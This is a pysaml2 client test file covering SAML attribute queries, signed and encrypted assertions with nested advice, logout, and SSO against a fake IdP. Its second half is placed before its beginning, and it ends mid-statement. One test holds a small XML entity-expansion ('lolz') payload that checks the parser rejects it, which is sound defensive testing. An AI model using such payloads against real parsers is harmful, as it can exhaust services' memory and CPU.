assert seresp.assertion
def test_sign_then_encrypt_assertion2(self):
# Begin with the IdPs side
_sec = self.server.sec
nameid_policy = samlp.NameIDPolicy(allow_create="false",
format=saml.NAMEID_FORMAT_PERSISTENT)
asser = Assertion({"givenName": "Derek", "sn": "Jeter"})
farg = add_path(
{},
['assertion', 'subject', 'subject_confirmation', 'method',
saml.SCM_BEARER])
add_path(
farg['assertion']['subject']['subject_confirmation'],
['subject_confirmation_data', 'in_response_to',
'_012345'])
add_path(
farg['assertion']['subject']['subject_confirmation'],
['subject_confirmation_data', 'recipient',
"http://lingon.catalogix.se:8087/"])
assertion = asser.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
name_id=factory(saml.NameID, format=saml.NAMEID_FORMAT_TRANSIENT),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
farg=farg['assertion']
)
assertion.signature = sigver.pre_signature_part(
assertion.id, _sec.my_cert, 1)
sigass = _sec.sign_statement(assertion, class_name(assertion),
key_file=self.client.sec.key_file,
node_id=assertion.id)
sigass = rm_xmltag(sigass)
response = sigver.response_factory(
in_response_to="_012345",
destination="http://lingon.catalogix.se:8087/",
status=s_utils.success_status_factory(),
issuer=self.server._issuer(),
encrypted_assertion=EncryptedAssertion()
)
xmldoc = "%s" % response
# strangely enough I get different tags if I run this test separately
# or as part of a bunch of tests.
xmldoc = add_subelement(xmldoc, "EncryptedAssertion", sigass)
enctext = _sec.crypto.encrypt_assertion(xmldoc,
self.client.sec.encryption_keypairs[
1]["cert_file"],
pre_encryption_part())
# seresp = samlp.response_from_string(enctext)
resp_str = encode_fn(enctext.encode())
# Now over to the client side
# Explicitely allow unsigned responses for this and the following 2 tests
self.client.want_response_signed = False
resp = self.client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"_012345": "http://foo.example.com/service"})
# assert resp.encrypted_assertion == []
assert resp.assertion
assert resp.ava == {'givenName': ['Derek'], 'sn': ['Jeter']}
def test_sign_then_encrypt_assertion_advice_1(self):
# Begin with the IdPs side
_sec = self.server.sec
nameid_policy = samlp.NameIDPolicy(allow_create="false",
format=saml.NAMEID_FORMAT_PERSISTENT)
asser = Assertion({"givenName": "Derek", "sn": "Jeter"})
subject_confirmation_specs = {
'recipient': "http://lingon.catalogix.se:8087/",
'in_response_to': "_012345",
'subject_confirmation_method': saml.SCM_BEARER
}
name_id = factory(saml.NameID, format=saml.NAMEID_FORMAT_TRANSIENT)
farg = add_path(
{},
['assertion', 'subject', 'subject_confirmation', 'method',
saml.SCM_BEARER])
add_path(
farg['assertion']['subject']['subject_confirmation'],
['subject_confirmation_data', 'in_response_to',
'_012345'])
add_path(
farg['assertion']['subject']['subject_confirmation'],
['subject_confirmation_data', 'recipient',
"http://lingon.catalogix.se:8087/"])
assertion = asser.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
name_id=name_id,
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
farg=farg['assertion'])
a_asser = Assertion({"uid": "test01", "email": "<EMAIL>"})
a_assertion = a_asser.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
name_id=name_id,
farg=farg['assertion'])
a_assertion.signature = sigver.pre_signature_part(
a_assertion.id, _sec.my_cert, 1)
assertion.advice = Advice()
assertion.advice.encrypted_assertion = []
assertion.advice.encrypted_assertion.append(EncryptedAssertion())
assertion.advice.encrypted_assertion[0].add_extension_element(
a_assertion)
response = sigver.response_factory(
in_response_to="_012345",
destination="http://lingon.catalogix.se:8087/",
status=s_utils.success_status_factory(),
issuer=self.server._issuer()
)
response.assertion.append(assertion)
response = _sec.sign_statement("%s" % response, class_name(a_assertion),
key_file=self.client.sec.key_file,
node_id=a_assertion.id)
# xmldoc = "%s" % response
# strangely enough I get different tags if I run this test separately
# or as part of a bunch of tests.
# xmldoc = add_subelement(xmldoc, "EncryptedAssertion", sigass)
node_xpath = ''.join(["/*[local-name()=\"%s\"]" % v for v in
["Response", "Assertion", "Advice",
"EncryptedAssertion", "Assertion"]])
enctext = _sec.crypto.encrypt_assertion(response,
self.client.sec.encryption_keypairs[
0]["cert_file"],
pre_encryption_part(),
node_xpath=node_xpath)
# seresp = samlp.response_from_string(enctext)
resp_str = encode_fn(enctext.encode())
# Now over to the client side
resp = self.client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"_012345": "http://foo.example.com/service"})
# assert resp.encrypted_assertion == []
assert resp.assertion
assert resp.assertion.advice
assert resp.assertion.advice.assertion
assert resp.ava == \
{'sn': ['Jeter'], 'givenName': ['Derek'], 'uid': ['test01'],
'email': ['<EMAIL>']}
def test_sign_then_encrypt_assertion_advice_2(self):
# Begin with the IdPs side
_sec = self.server.sec
nameid_policy = samlp.NameIDPolicy(allow_create="false",
format=saml.NAMEID_FORMAT_PERSISTENT)
asser_1 = Assertion({"givenName": "Derek"})
farg = add_path(
{},
['assertion', 'subject', 'subject_confirmation', 'method',
saml.SCM_BEARER])
add_path(
farg['assertion']['subject']['subject_confirmation'],
['subject_confirmation_data', 'in_response_to',
'_012345'])
add_path(
farg['assertion']['subject']['subject_confirmation'],
['subject_confirmation_data', 'recipient',
"http://lingon.catalogix.se:8087/"])
name_id = factory(saml.NameID, format=saml.NAMEID_FORMAT_TRANSIENT)
assertion_1 = asser_1.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
name_id=name_id,
farg=farg['assertion'])
asser_2 = Assertion({"sn": "Jeter"})
assertion_2 = asser_2.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
name_id=name_id,
farg=farg['assertion'])
a_asser_1 = Assertion({"uid": "test01"})
a_assertion_1 = a_asser_1.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
name_id=name_id,
farg=farg['assertion'])
a_asser_2 = Assertion({"email": "<EMAIL>"})
a_assertion_2 = a_asser_2.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
name_id=name_id,
farg=farg['assertion'])
a_asser_3 = Assertion({"street": "street"})
a_assertion_3 = a_asser_3.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
name_id=name_id,
farg=farg['assertion'])
a_asser_4 = Assertion({"title": "title"})
a_assertion_4 = a_asser_4.construct(
self.client.config.entityid,
self.server.config.attribute_converters,
self.server.config.getattr("policy", "idp"),
issuer=self.server._issuer(),
authn_class=INTERNETPROTOCOLPASSWORD,
authn_auth="http://www.example.com/login",
name_id=name_id,
farg=farg['assertion'])
a_assertion_1.signature = sigver.pre_signature_part(
a_assertion_1.id, _sec.my_cert, 1)
a_assertion_2.signature = sigver.pre_signature_part(
a_assertion_2.id, _sec.my_cert, 1)
a_assertion_3.signature = sigver.pre_signature_part(
a_assertion_3.id, _sec.my_cert, 1)
a_assertion_4.signature = sigver.pre_signature_part(
a_assertion_4.id, _sec.my_cert, 1)
assertion_1.signature = sigver.pre_signature_part(assertion_1.id,
_sec.my_cert, 1)
assertion_2.signature = sigver.pre_signature_part(assertion_2.id,
_sec.my_cert, 1)
response = sigver.response_factory(
in_response_to="_012345",
destination="http://lingon.catalogix.se:8087/",
status=s_utils.success_status_factory(),
issuer=self.server._issuer()
)
response.assertion = assertion_1
response.assertion.advice = Advice()
response.assertion.advice.encrypted_assertion = []
response.assertion.advice.encrypted_assertion.append(
EncryptedAssertion())
response.assertion.advice.encrypted_assertion[0].add_extension_element(
a_assertion_1)
advice_tag = response.assertion.advice._to_element_tree().tag
assertion_tag = a_assertion_1._to_element_tree().tag
response = \
response.get_xml_string_with_self_contained_assertion_within_advice_encrypted_assertion(
assertion_tag, advice_tag)
response = _sec.sign_statement("%s" % response,
class_name(a_assertion_1),
key_file=self.server.sec.key_file,
node_id=a_assertion_1.id)
node_xpath = ''.join(["/*[local-name()=\"%s\"]" % v for v in
["Response", "Assertion", "Advice",
"EncryptedAssertion", "Assertion"]])
enctext = _sec.crypto.encrypt_assertion(response,
self.client.sec.encryption_keypairs[
1]["cert_file"],
pre_encryption_part(),
node_xpath=node_xpath)
response = samlp.response_from_string(enctext)
response.assertion = response.assertion[0]
response.assertion.advice.encrypted_assertion.append(
EncryptedAssertion())
response.assertion.advice.encrypted_assertion[1].add_extension_element(
a_assertion_2)
advice_tag = response.assertion.advice._to_element_tree().tag
assertion_tag = a_assertion_2._to_element_tree().tag
response = \
response.get_xml_string_with_self_contained_assertion_within_advice_encrypted_assertion(
assertion_tag, advice_tag)
response = _sec.sign_statement("%s" % response,
class_name(a_assertion_2),
key_file=self.server.sec.key_file,
node_id=a_assertion_2.id)
node_xpath = ''.join(["/*[local-name()=\"%s\"]" % v for v in
["Response", "Assertion", "Advice",
"EncryptedAssertion", "Assertion"]])
enctext = _sec.crypto.encrypt_assertion(response,
self.client.sec.encryption_keypairs[
0]["cert_file"],
pre_encryption_part(),
node_xpath=node_xpath)
response = samlp.response_from_string(enctext)
response.assertion = response.assertion[0]
assertion_tag = response.assertion._to_element_tree().tag
response = pre_encrypt_assertion(response)
response = \
response.get_xml_string_with_self_contained_assertion_within_encrypted_assertion(
assertion_tag)
response = _sec.sign_statement("%s" % response, class_name(assertion_1),
key_file=self.server.sec.key_file,
node_id=assertion_1.id)
enctext = _sec.crypto.encrypt_assertion(response,
self.client.sec.encryption_keypairs[
1]["cert_file"],
pre_encryption_part())
response = samlp.response_from_string(enctext)
response.assertion = assertion_2
response.assertion.advice = Advice()
response.assertion.advice.encrypted_assertion = []
response.assertion.advice.encrypted_assertion.append(
EncryptedAssertion())
response.assertion.advice.encrypted_assertion[0].add_extension_element(
a_assertion_3)
advice_tag = response.assertion.advice._to_element_tree().tag
assertion_tag = a_assertion_3._to_element_tree().tag
response = \
response.get_xml_string_with_self_contained_assertion_within_advice_encrypted_assertion(
assertion_tag, advice_tag)
response = _sec.sign_statement("%s" % response,
class_name(a_assertion_3),
key_file=self.server.sec.key_file,
node_id=a_assertion_3.id)
node_xpath = ''.join(["/*[local-name()=\"%s\"]" % v for v in
["Response", "Assertion", "Advice",
"EncryptedAssertion", "Assertion"]])
enctext = _sec.crypto.encrypt_assertion(response,
self.client.sec.encryption_keypairs[
0]["cert_file"],
pre_encryption_part(),
node_xpath=node_xpath)
response = samlp.response_from_string(enctext)
response.assertion = response.assertion[0]
response.assertion.advice.encrypted_assertion.append(
EncryptedAssertion())
response.assertion.advice.encrypted_assertion[1].add_extension_element(
a_assertion_4)
advice_tag = response.assertion.advice._to_element_tree().tag
assertion_tag = a_assertion_4._to_element_tree().tag
response = \
response.get_xml_string_with_self_contained_assertion_within_advice_encrypted_assertion(
assertion_tag, advice_tag)
response = _sec.sign_statement("%s" % response,
class_name(a_assertion_4),
key_file=self.server.sec.key_file,
node_id=a_assertion_4.id)
node_xpath = ''.join(["/*[local-name()=\"%s\"]" % v for v in
["Response", "Assertion", "Advice",
"EncryptedAssertion", "Assertion"]])
enctext = _sec.crypto.encrypt_assertion(response,
self.client.sec.encryption_keypairs[
1]["cert_file"],
pre_encryption_part(),
node_xpath=node_xpath)
response = samlp.response_from_string(enctext)
response = _sec.sign_statement("%s" % response,
class_name(response.assertion[0]),
key_file=self.server.sec.key_file,
node_id=response.assertion[0].id)
response = samlp.response_from_string(response)
# seresp = samlp.response_from_string(enctext)
resp_str = encode_fn(str(response).encode())
# Now over to the client side
resp = self.client.parse_authn_request_response(
resp_str, BINDING_HTTP_POST,
{"_012345": "http://foo.example.com/service"})
# assert resp.encrypted_assertion == []
assert resp.assertion
assert resp.assertion.advice
assert resp.assertion.advice.assertion
assert resp.ava == \
{'street': ['street'], 'uid': ['test01'], 'title': ['title'],
'givenName': ['Derek'], 'email':
['<EMAIL>'], 'sn': ['Jeter']}
def test_signed_redirect(self):
# Revert configuration change to disallow unsinged responses
self.client.want_response_signed = True
msg_str = "%s" % self.client.create_authn_request(
"http://localhost:8088/sso", message_id="id1")[1]
info = self.client.apply_binding(
BINDING_HTTP_REDIRECT, msg_str, destination="",
relay_state="relay2", sigalg=SIG_RSA_SHA256)
loc = info["headers"][0][1]
qs = parse_qs(loc[1:])
assert _leq(qs.keys(),
['SigAlg', 'SAMLRequest', 'RelayState', 'Signature'])
assert verify_redirect_signature(list_values2simpletons(qs),
self.client.sec.sec_backend)
res = self.server.parse_authn_request(qs["SAMLRequest"][0],
BINDING_HTTP_REDIRECT)
def test_do_logout_signed_redirect(self):
conf = config.SPConfig()
conf.load_file("sp_slo_redirect_conf")
client = Saml2Client(conf)
# information about the user from an IdP
session_info = {
"name_id": nid,
"issuer": "urn:mace:example.com:saml:roland:idp",
"not_on_or_after": in_a_while(minutes=15),
"ava": {
"givenName": "Anders",
"sn": "Andersson",
"mail": "<EMAIL>"
}
}
client.users.add_information_about_person(session_info)
entity_ids = client.users.issuers_of_info(nid)
assert entity_ids == ["urn:mace:example.com:saml:roland:idp"]
resp = client.do_logout(nid, entity_ids, "Tired", in_a_while(minutes=5),
sign=True,
expected_binding=BINDING_HTTP_REDIRECT)
assert list(resp.keys()) == entity_ids
binding, info = resp[entity_ids[0]]
assert binding == BINDING_HTTP_REDIRECT
loc = info["headers"][0][1]
_, _, _, _, qs, _ = urlparse(loc)
qs = parse_qs(qs)
assert _leq(qs.keys(),
['SigAlg', 'SAMLRequest', 'RelayState', 'Signature'])
assert verify_redirect_signature(list_values2simpletons(qs),
client.sec.sec_backend)
res = self.server.parse_logout_request(qs["SAMLRequest"][0],
BINDING_HTTP_REDIRECT)
def test_do_logout_post(self):
# information about the user from an IdP
session_info = {
"name_id": nid,
"issuer": "urn:mace:example.com:saml:roland:idp",
"not_on_or_after": in_a_while(minutes=15),
"ava": {
"givenName": "Anders",
"sn": "Andersson",
"mail": "<EMAIL>"
},
"session_index": SessionIndex("_foo")
}
self.client.users.add_information_about_person(session_info)
entity_ids = self.client.users.issuers_of_info(nid)
assert entity_ids == ["urn:mace:example.com:saml:roland:idp"]
resp = self.client.do_logout(nid, entity_ids, "Tired",
in_a_while(minutes=5), sign=True,
expected_binding=BINDING_HTTP_POST)
assert resp
assert len(resp) == 1
assert list(resp.keys()) == entity_ids
binding, info = resp[entity_ids[0]]
assert binding == BINDING_HTTP_POST
_dic = unpack_form(info["data"])
res = self.server.parse_logout_request(_dic["SAMLRequest"],
BINDING_HTTP_POST)
assert b'<ns0:SessionIndex>_foo</ns0:SessionIndex>' in res.xmlstr
def test_do_logout_session_expired(self):
# information about the user from an IdP
session_info = {
"name_id": nid,
"issuer": "urn:mace:example.com:saml:roland:idp",
"not_on_or_after": a_while_ago(minutes=15),
"ava": {
"givenName": "Anders",
"sn": "Andersson",
"mail": "<EMAIL>"
},
"session_index": SessionIndex("_foo")
}
self.client.users.add_information_about_person(session_info)
entity_ids = self.client.users.issuers_of_info(nid)
assert entity_ids == ["urn:mace:example.com:saml:roland:idp"]
resp = self.client.do_logout(nid, entity_ids, "Tired",
in_a_while(minutes=5), sign=True,
expected_binding=BINDING_HTTP_POST)
assert resp
assert len(resp) == 1
assert list(resp.keys()) == entity_ids
binding, info = resp[entity_ids[0]]
assert binding == BINDING_HTTP_POST
_dic = unpack_form(info["data"])
res = self.server.parse_logout_request(_dic["SAMLRequest"],
BINDING_HTTP_POST)
assert b'<ns0:SessionIndex>_foo</ns0:SessionIndex>' in res.xmlstr
# Below can only be done with dummy Server
IDP = "urn:mace:example.com:saml:roland:idp"
class TestClientWithDummy():
def setup_class(self):
self.server = FakeIDP("idp_all_conf")
conf = config.SPConfig()
conf.load_file("servera_conf")
self.client = Saml2Client(conf)
self.client.send = self.server.receive
def test_do_authn(self):
binding = BINDING_HTTP_REDIRECT
response_binding = BINDING_HTTP_POST
sid, http_args = self.client.prepare_for_authenticate(
IDP, "http://www.example.com/relay_state",
binding=binding, response_binding=response_binding)
assert isinstance(sid, six.string_types)
assert len(http_args) == 4
assert http_args["headers"][0][0] == "Location"
assert http_args["data"] == []
redirect_url = http_args["headers"][0][1]
_, _, _, _, qs, _ = urlparse(redirect_url)
qs_dict = parse_qs(qs)
req = self.server.parse_authn_request(qs_dict["SAMLRequest"][0],
binding)
resp_args = self.server.response_args(req.message, [response_binding])
assert resp_args["binding"] == response_binding
def test_do_negotiated_authn(self):
binding = BINDING_HTTP_REDIRECT
response_binding = BINDING_HTTP_POST
sid, auth_binding, http_args = \
self.client.prepare_for_negotiated_authenticate(
IDP, "http://www.example.com/relay_state",
binding=binding, response_binding=response_binding)
assert binding == auth_binding
assert isinstance(sid, six.string_types)
assert len(http_args) == 4
assert http_args["headers"][0][0] == "Location"
assert http_args["data"] == []
redirect_url = http_args["headers"][0][1]
_, _, _, _, qs, _ = urlparse(redirect_url)
qs_dict = parse_qs(qs)
req = self.server.parse_authn_request(qs_dict["SAMLRequest"][0],
binding)
resp_args = self.server.response_args(req.message, [response_binding])
assert resp_args["binding"] == response_binding
def test_do_attribute_query(self):
response = self.client.do_attribute_query(
IDP, "_e7b68a04488f715cda642fbdd90099f5",
attribute={"eduPersonAffiliation": None},
nameid_format=NAMEID_FORMAT_TRANSIENT)
def test_logout_1(self):
""" one IdP/AA logout from"""
# information about the user from an IdP
session_info = {
"name_id": nid,
"issuer": "urn:mace:example.com:saml:roland:idp",
"not_on_or_after": in_a_while(minutes=15),
"ava": {
"givenName": "Anders",
"sn": "Andersson",
"mail": "<EMAIL>"
}
}
self.client.users.add_information_about_person(session_info)
entity_ids = self.client.users.issuers_of_info(nid)
assert entity_ids == ["urn:mace:example.com:saml:roland:idp"]
resp = self.client.global_logout(nid, "Tired", in_a_while(minutes=5))
assert resp
assert len(resp) == 1
assert list(resp.keys()) == entity_ids
response = resp[entity_ids[0]]
assert isinstance(response, LogoutResponse)
assert response.return_addrs
assert len(response.return_addrs) == 1
def test_post_sso(self):
binding = BINDING_HTTP_POST
response_binding = BINDING_HTTP_POST
sid, http_args = self.client.prepare_for_authenticate(
"urn:mace:example.com:saml:roland:idp", relay_state="really",
binding=binding, response_binding=response_binding)
_dic = unpack_form(http_args["data"])
req = self.server.parse_authn_request(_dic["SAMLRequest"], binding)
resp_args = self.server.response_args(req.message, [response_binding])
assert resp_args["binding"] == response_binding
# Normally a response would now be sent back to the users web client
# Here I fake what the client will do
# create the form post
http_args["data"] = urlencode(_dic)
http_args["method"] = "POST"
http_args["dummy"] = _dic["SAMLRequest"]
http_args["headers"] = [('Content-type',
'application/x-www-form-urlencoded')]
response = self.client.send(**http_args)
_dic = unpack_form(response.text, "SAMLResponse")
# Explicitly allow unsigned responses for this test
self.client.want_response_signed = False
resp = self.client.parse_authn_request_response(_dic["SAMLResponse"],
BINDING_HTTP_POST,
{sid: "/"})
ac = resp.assertion.authn_statement[0].authn_context
assert ac.authenticating_authority[0].text == \
'http://www.example.com/login'
assert ac.authn_context_class_ref.text == INTERNETPROTOCOLPASSWORD
def test_negotiated_post_sso(self):
binding = BINDING_HTTP_POST
response_binding = BINDING_HTTP_POST
sid, auth_binding, http_args = self.client.prepare_for_negotiated_authenticate(
"urn:mace:example.com:saml:roland:idp", relay_state="really",
binding=binding, response_binding=response_binding)
_dic = unpack_form(http_args["data"])
assert binding == auth_binding
req = self.server.parse_authn_request(_dic["SAMLRequest"], binding)
resp_args = self.server.response_args(req.message, [response_binding])
assert resp_args["binding"] == response_binding
# Normally a response would now be sent back to the users web client
# Here I fake what the client will do
# create the form post
http_args["data"] = urlencode(_dic)
http_args["method"] = "POST"
http_args["dummy"] = _dic["SAMLRequest"]
http_args["headers"] = [('Content-type',
'application/x-www-form-urlencoded')]
response = self.client.send(**http_args)
_dic = unpack_form(response.text, "SAMLResponse")
resp = self.client.parse_authn_request_response(_dic["SAMLResponse"],
BINDING_HTTP_POST,
{sid: "/"})
ac = resp.assertion.authn_statement[0].authn_context
assert ac.authenticating_authority[0].text == \
'http://www.example.com/login'
assert ac.authn_context_class_ref.text == INTERNETPROTOCOLPASSWORD
class TestClientNoConfigContext():
def setup_class(self):
self.server = FakeIDP("idp_all_conf")
conf = config.Config() # not SPConfig
conf.load_file("servera_conf")
self.client = Saml2Client(conf)
self.client.send = self.server.receive
def test_logout_1(self):
""" one IdP/AA logout from"""
# information about the user from an IdP
session_info = {
"name_id": nid,
"issuer": "urn:mace:example.com:saml:roland:idp",
"not_on_or_after": in_a_while(minutes=15),
"ava": {
"givenName": "Anders",
"sn": "Andersson",
"mail": "<EMAIL>"
}
}
self.client.users.add_information_about_person(session_info)
entity_ids = self.client.users.issuers_of_info(nid)
assert entity_ids == ["urn:mace:example.com:saml:roland:idp"]
resp = self.client.global_logout(nid, "Tired", in_a_while(minutes=5))
assert resp
assert len(resp) == 1
assert list(resp.keys()) == entity_ids
response = resp[entity_ids[0]]
assert isinstance(response, LogoutResponse)
assert response.return_addrs
assert len(response.return_addrs) == 1
def test_parse_soap_enveloped_saml_xxe():
xml = """<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
]>
<lolz>&lol1;</lolz>
"""
with raises(EntitiesForbidden):
parse_soap_enveloped_saml(xml, None)
if __name__ == "__main__":
tc = TestClient()
tc.setup_class()
tc.test_sign_then_encrypt_assertion()
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
import base64
import uuid
import six
from future.backports.urllib.parse import parse_qs
from future.backports.urllib.parse import urlencode
from future.backports.urllib.parse import urlparse
from pytest import raises
from saml2.argtree import add_path
from saml2.cert import OpenSSLWrapper
from saml2.xmldsig import SIG_RSA_SHA256
from saml2 import BINDING_HTTP_POST
from saml2 import BINDING_HTTP_REDIRECT
from saml2 import config
from saml2 import class_name
from saml2 import extension_elements_to_elements
from saml2 import saml
from saml2 import samlp
from saml2 import sigver
from saml2 import s_utils
from saml2.assertion import Assertion
from saml2.extension.requested_attributes import RequestedAttributes
from saml2.extension.requested_attributes import RequestedAttribute
from saml2.authn_context import INTERNETPROTOCOLPASSWORD
from saml2.client import Saml2Client
from saml2.pack import parse_soap_enveloped_saml
from saml2.response import LogoutResponse
from saml2.saml import NAMEID_FORMAT_PERSISTENT, EncryptedAssertion, Advice
from saml2.saml import NAMEID_FORMAT_TRANSIENT
from saml2.saml import NameID
from saml2.samlp import SessionIndex
from saml2.server import Server
from saml2.sigver import pre_encryption_part, pre_encrypt_assertion
from saml2.sigver import rm_xmltag
from saml2.sigver import verify_redirect_signature
from saml2.s_utils import do_attribute_statement
from saml2.s_utils import factory
from saml2.time_util import in_a_while, a_while_ago
from defusedxml.common import EntitiesForbidden
from fakeIDP import FakeIDP
from fakeIDP import unpack_form
from pathutils import full_path
AUTHN = {
"class_ref": INTERNETPROTOCOLPASSWORD,
"authn_auth": "http://www.example.com/login"
}
encode_fn = getattr(base64, 'encodebytes', base64.encodestring)
def generate_cert():
sn = uuid.uuid4().urn
cert_info = {
"cn": "localhost",
"country_code": "se",
"state": "ac",
"city": "Umea",
"organization": "ITS",
"organization_unit": "DIRG"
}
osw = OpenSSLWrapper()
ca_cert_str = osw.read_str_from_file(
full_path("root_cert/localhost.ca.crt"))
ca_key_str = osw.read_str_from_file(
full_path("root_cert/localhost.ca.key"))
req_cert_str, req_key_str = osw.create_certificate(cert_info, request=True,
sn=sn, key_length=2048)
cert_str = osw.create_cert_signed_certificate(ca_cert_str, ca_key_str,
req_cert_str)
return cert_str, req_key_str
def add_subelement(xmldoc, node_name, subelem):
s = xmldoc.find(node_name)
if s > 0:
x = xmldoc.rindex("<", 0, s)
tag = xmldoc[x + 1:s - 1]
c = s + len(node_name)
spaces = ""
while xmldoc[c] == " ":
spaces += " "
c += 1
# Sometimes we get an xml header, sometimes we don't.
subelem_str = str(subelem)
if subelem_str[0:5].lower() == '<?xml':
subelem_str = subelem_str.split("\n", 1)[1]
xmldoc = xmldoc.replace(
"<%s:%s%s/>" % (tag, node_name, spaces),
"<%s:%s%s>%s</%s:%s>" % (tag, node_name, spaces, subelem_str, tag,
node_name))
return xmldoc
def for_me(condition, me):
for restriction in condition.audience_restriction:
audience = restriction.audience
if audience.text.strip() == me:
return True
def ava(attribute_statement):
result = {}
for attribute in attribute_statement.attribute:
# Check name_format ??
name = attribute.name.strip()
result[name] = []
for value in attribute.attribute_value:
result[name].append(value.text.strip())
return result
def _leq(l1, l2):
return set(l1) == set(l2)
REQ1 = {"1.2.14": """<?xml version='1.0' encoding='UTF-8'?>
<ns0:AttributeQuery Destination="https://idp.example.com/idp/" ID="id1"
IssueInstant="%s" Version="2.0" xmlns:ns0="urn:oasis:names:tc:SAML:2
.0:protocol"><ns1:Issuer Format="urn:oasis:names:tc:SAML:2
.0:nameid-format:entity" xmlns:ns1="urn:oasis:names:tc:SAML:2
.0:assertion">urn:mace:example.com:saml:roland:sp</ns1:Issuer><ns1:Subject
xmlns:ns1="urn:oasis:names:tc:SAML:2.0:assertion"><ns1:NameID
Format="urn:oasis:names:tc:SAML:2
.0:nameid-format:persistent">E8042FB4-4D5B-48C3-8E14-8EDD852790DD</ns1:NameID
></ns1:Subject></ns0:AttributeQuery>""",
"1.2.16": """<?xml version='1.0' encoding='UTF-8'?>
<ns0:AttributeQuery xmlns:ns0="urn:oasis:names:tc:SAML:2.0:protocol"
xmlns:ns1="urn:oasis:names:tc:SAML:2.0:assertion" Destination="https://idp
.example.com/idp/" ID="id1" IssueInstant="%s" Version="2.0"><ns1:Issuer
Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity">urn:mace:example
.com:saml:roland:sp</ns1:Issuer><ns1:Subject><ns1:NameID
Format="urn:oasis:names:tc:SAML:2
.0:nameid-format:persistent">E8042FB4-4D5B-48C3-8E14-8EDD852790DD</ns1:NameID
></ns1:Subject></ns0:AttributeQuery>"""}
nid = NameID(name_qualifier="foo", format=NAMEID_FORMAT_TRANSIENT,
text="123456")
def list_values2simpletons(_dict):
return dict([(k, v[0]) for k, v in _dict.items()])
class TestClient:
def setup_class(self):
self.server = Server("idp_conf")
conf = config.SPConfig()
conf.load_file("server_conf")
self.client = Saml2Client(conf)
def teardown_class(self):
self.server.close()
def test_create_attribute_query1(self):
req_id, req = self.client.create_attribute_query(
"https://idp.example.com/idp/",
"E8042FB4-4D5B-48C3-8E14-8EDD852790DD",
format=saml.NAMEID_FORMAT_PERSISTENT,
message_id="id1")
reqstr = "%s" % req.to_string().decode()
assert req.destination == "https://idp.example.com/idp/"
assert req.id == "id1"
assert req.version == "2.0"
subject = req.subject
name_id = subject.name_id
assert name_id.format == saml.NAMEID_FORMAT_PERSISTENT
assert name_id.text == "E8042FB4-4D5B-48C3-8E14-8EDD852790DD"
issuer = req.issuer
assert issuer.text == "urn:mace:example.com:saml:roland:sp"
attrq = samlp.attribute_query_from_string(reqstr)
assert _leq(attrq.keyswv(), ['destination', 'subject', 'issue_instant',
'version', 'id', 'issuer'])
assert attrq.destination == req.destination
assert attrq.id == req.id
assert attrq.version == req.version
assert attrq.issuer.text == issuer.text
assert attrq.issue_instant == req.issue_instant
assert attrq.subject.name_id.format == name_id.format
assert attrq.subject.name_id.text == name_id.text
def test_create_attribute_query2(self):
req_id, req = self.client.create_attribute_query(
"https://idp.example.com/idp/",
"E8042FB4-4D5B-48C3-8E14-8EDD852790DD",
attribute={
("urn:oid:2.5.4.42",
"urn:oasis:names:tc:SAML:2.0:attrname-format:uri",
"givenName"): None,
("urn:oid:2.5.4.4",
"urn:oasis:names:tc:SAML:2.0:attrname-format:uri",
"surname"): None,
("urn:oid:1.2.840.113549.1.9.1",
"urn:oasis:names:tc:SAML:2.0:attrname-format:uri"): None,
},
format=saml.NAMEID_FORMAT_PERSISTENT,
message_id="id1")
assert req.destination == "https://idp.example.com/idp/"
assert req.id == "id1"
assert req.version == "2.0"
subject = req.subject
name_id = subject.name_id
assert name_id.format == saml.NAMEID_FORMAT_PERSISTENT
assert name_id.text == "E8042FB4-4D5B-48C3-8E14-8EDD852790DD"
assert len(req.attribute) == 3
# one is givenName
seen = []
for attribute in req.attribute:
if attribute.name == "urn:oid:2.5.4.42":
assert attribute.name_format == saml.NAME_FORMAT_URI
assert attribute.friendly_name == "givenName"
seen.append("givenName")
elif attribute.name == "urn:oid:2.5.4.4":
assert attribute.name_format == saml.NAME_FORMAT_URI
assert attribute.friendly_name == "surname"
seen.append("surname")
elif attribute.name == "urn:oid:1.2.840.113549.1.9.1":
assert attribute.name_format == saml.NAME_FORMAT_URI
if getattr(attribute, "friendly_name"):
assert False
seen.append("email")
assert _leq(seen, ["givenName", "surname", "email"])
def test_create_attribute_query_3(self):
req_id, req = self.client.create_attribute_query(
"https://aai-demo-idp.switch.ch/idp/shibboleth",
"_e7b68a04488f715cda642fbdd90099f5",
format=saml.NAMEID_FORMAT_TRANSIENT,
message_id="id1")
assert isinstance(req, samlp.AttributeQuery)
assert req.destination == "https://aai-demo-idp.switch" \
